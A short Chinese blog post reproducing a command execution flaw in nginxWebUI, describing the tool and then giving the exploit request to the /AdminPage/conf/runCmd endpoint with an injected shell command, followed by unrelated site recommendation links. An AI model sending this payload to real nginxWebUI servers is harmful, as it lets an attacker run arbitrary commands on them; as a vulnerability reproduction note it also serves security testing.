nginxWebUI runCmd命令执行漏洞复现

仲瑿2023-07-25 19:09

系统描述

NginxWebUI 是一款图形化管理 nginx 配置的工具,可以使用网页来快速配置 nginx单机与集群的各项功能,包括 http协议转发,tcp协议转发,反向代理,负载均衡,静态 html服务器,ssl证书自动申请、续签、配置等,配置好后可一建生成 nginx.conf文件,同时可控制 nginx使用此文件进行启动与重载,完成对 nginx的图形化控制闭环。

漏洞复现

访问url

复制代码 
url地址 + /AdminPage/conf/runCmd?cmd=id%26%26echo%20nginx
复制代码 
url地址 + /AdminPage/conf/runCmd?cmd=命令%26%26echo%20nginx
相关推荐
智象科技2 分钟前
智能运维(AIOps),正在改变IT行业格局
运维·人工智能·运维开发·devops·智能运维
黄筱筱筱筱筱筱筱22 分钟前
RHCE---web服务器①
linux·运维·服务器
上海云盾安全满满31 分钟前
服务器被攻击了,更换IP是否有用吗
服务器·网络·tcp/ip
AC赳赳老秦38 分钟前
全链路自动化巡检:用 OpenClaw 实现服务器 - 应用 - 数据库全链路巡检,自动生成报告与整改建议
服务器·数据库·人工智能·深度学习·自动化·deepseek·openclaw
流浪00140 分钟前
Linux基础篇(三)轻松拿捏入门级指令
linux·运维·服务器
weixin_5142531843 分钟前
511-opencua-best_patch
服务器
Waay1 小时前
Linux Shell 知识点考评(三):awk文本分析(附答案)
linux·服务器·编辑器
爱喝水的鱼丶1 小时前
SAP-ABAP:ABAP Development Tools(ADT)安装配置学习分享教程(四篇连载) 第二篇:ADT客户端完整安装与初始配置教程
运维·开发语言·学习·sap·abap
其实防守也摸鱼1 小时前
Upload-labs:部署靶场及Pass-01实战解析
服务器·网络·安全·web安全·教程·文件上传·工具
xlq223221 小时前
53.tcp socket
linux·服务器·开发语言·网络·网络协议·tcp/ip
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03【AI】2026 年具身智能模型和世界模型总结04CC-Switch & Claude 基于 Linux 服务器安装使用指南05零基础教你claude code 接入 deepseek V406Windows端Codex接入第三方模型(DeekSeek,BaiLian)07要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法08Cursor 接入 DeepSeek‑V4‑Pro 完整指南(2026 实测)092026年AI前瞻:量子AI、具身智能与科学发现的新纪元10裂开!ChatGPT 居然开始要手机号验证,附详细解决方法